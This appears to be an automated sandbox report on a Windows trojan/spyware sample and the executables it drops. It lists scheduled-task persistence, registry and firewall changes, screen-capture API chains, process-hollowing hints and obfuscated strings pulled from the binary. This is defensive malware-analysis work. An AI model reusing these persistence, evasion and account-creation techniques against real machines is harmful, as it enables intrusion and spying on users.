                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000761F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority

                          System Summary

                          Source: rundrive[1].exe.1.drStatic PE information: section name:
                          Source: rundrive[1].exe.1.drStatic PE information: section name: .idata
                          Source: rundrive[1].exe.1.drStatic PE information: section name:
                          Source: rundrive.exe.1.drStatic PE information: section name:
                          Source: rundrive.exe.1.drStatic PE information: section name: .idata
                          Source: rundrive.exe.1.drStatic PE information: section name:
                          Source: eafkou.exe.4.drStatic PE information: section name:
                          Source: eafkou.exe.4.drStatic PE information: section name: .idata
                          Source: eafkou.exe.4.drStatic PE information: section name:
                          Source: C:\ProgramData\rcjuo\eafkou.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeFile created: C:\Windows\Tasks\Gxtuum.job
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeFile created: C:\Windows\Tasks\Test Task17.job
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000761F0
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000B40E7
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000AC77D
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000A2CC0
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_00074EF0
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000ACF09
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000751A0
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_00075450
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_0009B560
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_0009F77B
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000B1977
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000B5D74
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: 0_2_000B5E94
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008D61F0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008DB700
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_009140E7
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_00902CC0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008D4EF0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_0090CF09
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008D51A0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008D5450
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008FB560
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008FF77B
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_00915D74
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_00915E94
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_009140E7
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_008D61F0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_0090C77D
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_00902CC0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_008D4EF0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_0090CF09
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_008D51A0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_008D5450
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_008FB560
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_008FF77B
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_00911977
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_00915D74
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 2_2_00915E94
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: String function: 00093FF0 appears 136 times
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeCode function: String function: 0009A610 appears 56 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 008F9DC3 appears 76 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 008F30E0 appears 58 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 009084EC appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 008D61F0 appears 33 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 008F3FF0 appears 272 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 009024D8 appears 52 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 008FA610 appears 112 times
                          Source: XO4ioEY3nq.exeStatic PE information: invalid certificate
                          Source: XO4ioEY3nq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: rundrive[1].exe.1.drStatic PE information: Section: vonkwwrp ZLIB complexity 0.9945210218078847
                          Source: rundrive.exe.1.drStatic PE information: Section: vonkwwrp ZLIB complexity 0.9945210218078847
                          Source: eafkou.exe.4.drStatic PE information: Section: vonkwwrp ZLIB complexity 0.9945210218078847
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@4/3
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_008DE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\10000550100\
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeMutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
                          Source: C:\ProgramData\rcjuo\eafkou.exeMutant created: \Sessions\1\BaseNamedObjects\Test Task17
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeFile created: C:\Users\user\AppData\Local\Temp\a58456755d
                          Source: XO4ioEY3nq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeFile read: C:\Users\desktop.ini
                          Source: C:\Users\user\Desktop\XO4ioEY3nq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: XO4ioEY3nq.exeVirustotal: Detection: 61%
                          Source: XO4ioEY3nq.exeReversingLabs: Detection: 73%
                          Source: XO4ioEY3nq.exeString found in binary or memory: " /add /y
                          Source: XO4ioEY3nq.exeString found in binary or memory: " /add
                          Source: Gxtuum.exeString found in binary or memory: " /add /y
                          Source: Gxtuum.exeString found in binary or memory: " /add
                          Source: Gxtuum.exeString found in binary or memory: " /add /y
                          Source: Gxtuum.exeString found in binary or memory: " /add
                          Source: rundrive.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: eafkou.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: XO4ioEY3nq.exeString found in binary or memory: " /add /y
                          Source: XO4ioEY3nq.exeString found in binary or memory: " /add
                          Source: XO4ioEY3nq.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 
Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | File read: C:\Users\user\Desktop\XO4ioEY3nq.exe
Source: unknown | Process created: C:\Users\user\Desktop\XO4ioEY3nq.exe "C:\Users\user\Desktop\XO4ioEY3nq.exe"
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe"
Source: unknown | Process created: C:\ProgramData\rcjuo\eafkou.exe C:\ProgramData\rcjuo\eafkou.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe"
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: mstask.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: mstask.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: mstask.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: mstask.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Section loaded: mpr.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: winmm.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: mstask.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: textinputframework.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: coreuicomponents.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: coremessaging.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: ntmarta.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: coremessaging.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: wintypes.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: wintypes.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: wintypes.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: wsock32.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: mswsock.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: dnsapi.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: iphlpapi.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: fwpuclnt.dll
Source: C:\ProgramData\rcjuo\eafkou.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: XO4ioEY3nq.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: XO4ioEY3nq.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XO4ioEY3nq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: XO4ioEY3nq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: XO4ioEY3nq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: XO4ioEY3nq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: XO4ioEY3nq.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Unpacked PE file: 4.2.rundrive.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW;
Source: C:\ProgramData\rcjuo\eafkou.exe | Unpacked PE file: 5.2.eafkou.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: XO4ioEY3nq.exe | Static PE information: real checksum: 0x0 should be: 0x8038a
Source: rundrive.exe.1.dr | Static PE information: real checksum: 0x1bacf5 should be: 0x1b7b92
Source: rundrive[1].exe.1.dr | Static PE information: real checksum: 0x1bacf5 should be: 0x1b7b92
Source: eafkou.exe.4.dr | Static PE information: real checksum: 0x1bacf5 should be: 0x1b7b92
